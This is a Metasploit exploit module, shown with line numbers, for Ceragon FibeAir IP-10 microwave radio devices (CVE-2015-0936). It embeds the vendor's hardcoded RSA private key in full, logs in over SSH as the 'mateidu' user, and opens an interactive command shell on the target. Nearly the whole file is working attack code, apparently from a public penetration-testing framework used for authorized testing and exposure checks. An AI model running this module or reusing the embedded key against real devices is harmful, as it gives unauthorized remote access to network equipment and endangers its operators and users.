Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  include Msf::Auxiliary::Report
11
  include Msf::Exploit::Remote::SSH
12

13
  Rank = ExcellentRanking
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        {
20
          'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
21
          'Description' => %q{
22
            Ceragon ships a public/private key pair on FibeAir IP-10 devices
23
            that allows passwordless authentication to any other IP-10 device.
24
            Since the key is easily retrievable, an attacker can use it to
25
            gain unauthorized remote access as the "mateidu" user.
26
          },
27
          'Platform' => 'unix',
28
          'Arch' => ARCH_CMD,
29
          'Privileged' => false,
30
          'Targets' => [ [ 'Universal', {} ] ],
31
          'Payload' => {
32
            'Compat' => {
33
              'PayloadType' => 'cmd_interact',
34
              'ConnectionType' => 'find'
35
            }
36
          },
37
          'Author' => [
38
            'hdm', # Discovery
39
            'todb' # Metasploit module and advisory text (mostly copy-paste)
40
          ],
41
          'License' => MSF_LICENSE,
42
          'References' => [
43
            ['CVE', '2015-0936'],
44
            ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
45
          ],
46
          'DisclosureDate' => '2015-04-01', # Not a joke
47
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
48
          'DefaultTarget' => 0,
49
          'Notes' => {
50
            'Stability' => [CRASH_SAFE],
51
            'Reliability' => [REPEATABLE_SESSION],
52
            'SideEffects' => []
53
          }
54
        }
55
      )
56
    )
57

58
    register_options(
59
      [
60
        # Since we don't include Tcp, we have to register this manually
61
        Opt::RHOST(),
62
        Opt::RPORT(22)
63
      ], self.class
64
    )
65

66
    register_advanced_options(
67
      [
68
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
69
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
70
      ]
71
    )
72
  end
73

74
  # helper methods that normally come from Tcp
75
  def rhost
76
    datastore['RHOST']
77
  end
78

79
  def rport
80
    datastore['RPORT']
81
  end
82

83
  def do_login(user)
84
    opt_hash = ssh_client_defaults.merge({
85
      auth_methods: ['publickey'],
86
      port: rport,
87
      key_data: [ key_data ]
88
    })
89
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
90
    begin
91
      ssh_socket = nil
92
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
93
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
94
      end
95
    rescue Rex::ConnectionError
96
      return nil
97
    rescue Net::SSH::Disconnect, ::EOFError
98
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
99
      return nil
100
    rescue ::Timeout::Error
101
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
102
      return nil
103
    rescue Net::SSH::AuthenticationFailed
104
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
105
      return nil
106
    rescue Net::SSH::Exception => e
107
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
108
      return nil
109
    end
110

111
    if ssh_socket
112

113
      # Create a new session from the socket, then dump it.
114
      conn = Net::SSH::CommandStream.new(ssh_socket)
115
      ssh_socket = nil
116

117
      return conn
118
    else
119
      return nil
120
    end
121
  end
122

123
  def exploit
124
    conn = do_login('mateidu')
125
    if conn
126
      print_good "#{rhost}:#{rport} - Successful login"
127
      handler(conn.lsock)
128
    end
129
  end
130

131
  def key_data
132
    <<~EOF
133
      -----BEGIN RSA PRIVATE KEY-----
134
      MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
135
      MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
136
      IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
137
      gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
138
      CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
139
      4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
140
      SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
141
      B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
142
      93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
143
      WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
144
      YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
145
      7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
146
      uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
147
      -----END RSA PRIVATE KEY-----
148
    EOF
149
  end
150
end
151

152